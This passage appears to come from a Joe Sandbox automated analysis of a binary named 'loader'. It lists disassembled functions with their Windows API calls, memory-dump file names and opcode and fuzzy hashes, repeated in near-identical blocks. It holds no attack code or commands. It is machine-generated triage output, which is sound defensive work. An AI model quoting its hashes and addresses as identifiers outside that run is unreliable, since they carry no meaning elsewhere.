              APIs
              • GdiplusShutdown.GDIPLUS(?,?,?,?,00131FA1,000000FF), ref: 0011A3D1
              • CoUninitialize.COMBASE(?,?,?,?,00131FA1,000000FF), ref: 0011A3D6
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: GdiplusShutdownUninitialize
              • String ID:
              • API String ID: 3856339756-0
              • Opcode ID: 41665e73079e29da22e596bbb6d1296a7d4aed7f7317276109cbc68d419486ba
              • Instruction ID: 8ef9e6611776dbbf04ac335daace19850f5fadf82951e895e8148fb1d71dfb22
              • Opcode Fuzzy Hash: 41665e73079e29da22e596bbb6d1296a7d4aed7f7317276109cbc68d419486ba
              • Instruction Fuzzy Hash: 58F06D32618A54EFC710EB4CDC05B5AFBACFB89B20F04436AF41983B60CB796840CA91
              Function 0010A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
              Download Yara Rule
              APIs
              • GetFileAttributesW.KERNELBASE(?,?,?,0010A189,?,001076B2,?,?,?,?), ref: 0010A1A5
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0010A189,?,001076B2,?,?,?,?), ref: 0010A1D1
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: a2d9ca61abee002c8c8ca2e1bb6460890fdcf075aabaf160718922d47c6987f0
              • Instruction ID: 01d83d16a8646f58cc9e0d536c60759ed5906b6c990f00eb0a60b521b58d9e18
              • Opcode Fuzzy Hash: a2d9ca61abee002c8c8ca2e1bb6460890fdcf075aabaf160718922d47c6987f0
              • Instruction Fuzzy Hash: EAE092355041289BDB20BB68DC05BD9B7ACEB1C3E1F0042A1FD94E36D0D7B19E889AE0
              Function 00110085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
              Download Yara Rule
              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001100A0
              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0010EB86,Crypt32.dll,00000000,0010EC0A,?,?,0010EBEC,?,?,?), ref: 001100C2
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: DirectoryLibraryLoadSystem
              • String ID:
              • API String ID: 1175261203-0
              • Opcode ID: fd012ed9a08fee64b45e0f3eb10dcdf7485390c03b18a2fb0b6cf5199969f6c7
              • Instruction ID: 908753d0ecf1e3a74a0c971829646e79586653d31cce94e51cf8d77f4bd5df67
              • Opcode Fuzzy Hash: fd012ed9a08fee64b45e0f3eb10dcdf7485390c03b18a2fb0b6cf5199969f6c7
              • Instruction Fuzzy Hash: 16E0127691111C6ADB219AA49C05FD677ACFF1D392F0400A5B948D3144DBB49AC4CBA4
              Function 00119B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
              Download Yara Rule
              APIs
              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00119B30
              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00119B37
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: BitmapCreateFromGdipStream
              • String ID:
              • API String ID: 1918208029-0
              • Opcode ID: a6ae484bc1f737a76c132ba6f21eefe616f3ce84e2e280ec9089aa1be3bae3fb
              • Instruction ID: 24e0899111e55774106b0cd2b8aa68b2809dbaf0a77c0d860cb97d4380e43047
              • Opcode Fuzzy Hash: a6ae484bc1f737a76c132ba6f21eefe616f3ce84e2e280ec9089aa1be3bae3fb
              • Instruction Fuzzy Hash: 94E0ED71909218EBCB18DFD9D501AD9B7E8EB09721F10806BEC9593200E771AE44DB95
              Function 0012215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0012329A: try_get_function.LIBVCRUNTIME ref: 001232AF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0012217A
              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00122185
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
              • String ID:
              • API String ID: 806969131-0
              • Opcode ID: 41ded1938555b6f5af9b0764280c8c3b35b9c7a5f517d77009b76d6d08085dfe
              • Instruction ID: 5538537b8d258bf79b428c31f5907dd109960e6a8d7f9622b204af6e60b31e40
              • Opcode Fuzzy Hash: 41ded1938555b6f5af9b0764280c8c3b35b9c7a5f517d77009b76d6d08085dfe
              • Instruction Fuzzy Hash: 8DD0226860433234BD0C27B03C43DAC2384A972BB03F00B46F330CA0E1EF7481706012
              Function 0011DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • DloadLock.DELAYIMP ref: 0011DC73
              • DloadProtectSection.DELAYIMP ref: 0011DC8F
                • Part of subcall function 0011DE67: DloadObtainSection.DELAYIMP ref: 0011DE77
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Dload$Section$LockObtainProtect
              • String ID:
              • API String ID: 731663317-0
              • Opcode ID: 82d2d89c5418783da2f32b05dac5012110b95d8a5efaf012cebc11bfb55cb75e
              • Instruction ID: 0e53684333dc8f219d9613c99d7be3b224f07d205deac9eaedc65442016e8e6c
              • Opcode Fuzzy Hash: 82d2d89c5418783da2f32b05dac5012110b95d8a5efaf012cebc11bfb55cb75e
              • Instruction Fuzzy Hash: 4CD012701402014AC71EEB64BD467DD3371B718744FA40AA5F105C78A0EFF45CD1C655
              Function 001012E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemShowWindow
              • String ID:
              • API String ID: 3351165006-0
              • Opcode ID: e9c112fc16b579ed1ba84facc5546a3129780755d9a1cecb9a20a4ba755a430a
              • Instruction ID: 75c8616a0360f35d99308983ace37bde0ee759e07ddf2fbf2f4cc494561227f1
              • Opcode Fuzzy Hash: e9c112fc16b579ed1ba84facc5546a3129780755d9a1cecb9a20a4ba755a430a
              • Instruction Fuzzy Hash: EEC0123205C620BFCB010BB0DC09D2FBBA8ABA6212F05C908F2A5C0060C238C090DB11
              Function 001019A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 36633c316ae6cfcb13bb28c6bd9f17c2f55471e475cdd7109848ab01ba392faf
              • Instruction ID: abb86b94be9ac2c22d375b67ec4b8754b13bb86d82e58dfb70597c0ff19c8a75
              • Opcode Fuzzy Hash: 36633c316ae6cfcb13bb28c6bd9f17c2f55471e475cdd7109848ab01ba392faf
              • Instruction Fuzzy Hash: 64C1B430A04244AFEF15DF68C484BA97BE5EF1A314F0840B9EC85DB2C6CBB99944CB61
              Function 00103B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 3784cd8f6e2a396cae60ee8a6937a9bea248ca05dc47203495366bf8ffa115f6
              • Instruction ID: 46a148efc01f0b1344e0758bee34e1064bcf7c4a20a0073972cb6f57b2b4bbe8
              • Opcode Fuzzy Hash: 3784cd8f6e2a396cae60ee8a6937a9bea248ca05dc47203495366bf8ffa115f6
              • Instruction Fuzzy Hash: 5A71D071104F44AEDB25DB70CC51AE7B7E8AF24301F44492EE5EB87182DBB16A48CF50
              Function 0010837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00108384
                • Part of subcall function 00101380: __EH_prolog.LIBCMT ref: 00101385
                • Part of subcall function 00101380: new.LIBCMT ref: 001013FE
                • Part of subcall function 001019A6: __EH_prolog.LIBCMT ref: 001019AB
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 596a8bc414b15251b6eff819abd23e4cb0827e696e8b8e9604b52410e8685691
              • Instruction ID: e415d60b87aea2ac30218cfeb469264d8421f0d1fe327644d007421c67585d6c
              • Opcode Fuzzy Hash: 596a8bc414b15251b6eff819abd23e4cb0827e696e8b8e9604b52410e8685691
              • Instruction Fuzzy Hash: 2D41A3319446589ADF24EB60CC55BEAB3A8AF64310F0440EAE5CAE70D3DFB55EC8DB50
              Function 00101E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00101E05
                • Part of subcall function 00103B3D: __EH_prolog.LIBCMT ref: 00103B42
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 61e5dcac2bba4586580c8014d5cbc0d8e37faa9021583657b40bc6ef47125d10
              • Instruction ID: 6b033eba664d999f5f2d5ae0eff0701f5eff6fdb3b16e65221b580a206621889
              • Opcode Fuzzy Hash: 61e5dcac2bba4586580c8014d5cbc0d8e37faa9021583657b40bc6ef47125d10
              • Instruction Fuzzy Hash: DC212B72944109AFCB15EF99D9519EEFBF6BF68300B10006EE885A7291CB765E50CB60
              Function 0011A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 0011A7C8
                • Part of subcall function 00101380: __EH_prolog.LIBCMT ref: 00101385
                • Part of subcall function 00101380: new.LIBCMT ref: 001013FE
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 8fb57111203a1689d90a7afe279249895e5434752e8f24c850307fa7bdafdc75
              • Instruction ID: 92b3e84dced38eb3f6c55727d86f9c5ac87c251d1dfb137d735be74099dab91b
              • Opcode Fuzzy Hash: 8fb57111203a1689d90a7afe279249895e5434752e8f24c850307fa7bdafdc75
              • Instruction Fuzzy Hash: 97217F71C05249AECF19DF94C9519EEBBF4FF29300F4004AEE849A7242DB796E46CB61
              Function 001092E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 64e8c6e301feb469cae468e946ae85de7b5e5b59fd91012b594c6dc2d954b217
              • Instruction ID: 1efc5eb416a52c2f7c78dd18e96d41d72568ba25fca29fb474e5ccc047b31abc
              • Opcode Fuzzy Hash: 64e8c6e301feb469cae468e946ae85de7b5e5b59fd91012b594c6dc2d954b217
              • Instruction Fuzzy Hash: 6A118673E0052897CB15ABA8CC519DDB735BF58750F044115F8447B2D2DB749D108AD0
              Function 0012BB8A Relevance: 1.6, APIs: 1, Instructions: 52COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001285A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00128FD3,00000001,00000364,?,00123713,00000050,?,00140EE8,00000200), ref: 001285EA
              • _free.LIBCMT ref: 0012BBF6
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AllocateHeap_free
              • String ID:
              • API String ID: 614378929-0
              • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
              • Instruction ID: 08f97818d12be9f852ae6283e30bc060ac294730b8874d5e3e12676558df0f37
              • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
              • Instruction Fuzzy Hash: C101F9726043596BE3318F65E88595AFBE9FB95370F25055DF59483280EB30A805C774
              Function 0010AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction ID: 5c6e43ad75b988a299a52ebf22d4b822f02d61b4fdaa0902c8e66efb742c356b
              • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction Fuzzy Hash: 4CF03C31A14709DFDB34DA65C945656B7E8EF25330F608A1AE4DAC76D0E7B0D880C792
              Function 001285A9 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00128FD3,00000001,00000364,?,00123713,00000050,?,00140EE8,00000200), ref: 001285EA
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: b0b1266afafa622c56c8cc61ae5ded980b55d84ef7fdc363d0b1ee50906c456c
              • Instruction ID: 3dca6d1862bd1658794210f04856af97f900cb6abcde30bb0ee6418c25cf296a
              • Opcode Fuzzy Hash: b0b1266afafa622c56c8cc61ae5ded980b55d84ef7fdc363d0b1ee50906c456c
              • Instruction Fuzzy Hash: 26F0E9316471316BDB255E26BC01B5B77C8AF917B0B19C111E819E60C1CF30DD318AE4
              Function 00105BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00105BDC
                • Part of subcall function 0010B07D: __EH_prolog.LIBCMT ref: 0010B082
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: fd76b50ed5dba5312d2f1999e4c867907ed83730a32c3416340dff34fc230a93
              • Instruction ID: d933d61d9607a03cdf9816f23c215eb56ed47a50a2dbafebfaf9ce39c27b4022
              • Opcode Fuzzy Hash: fd76b50ed5dba5312d2f1999e4c867907ed83730a32c3416340dff34fc230a93
              • Instruction Fuzzy Hash: 3A016D30A15684DAC725F7A4C0567DEFBE49F69700F40459EA89E532C3CBF41B0AC762
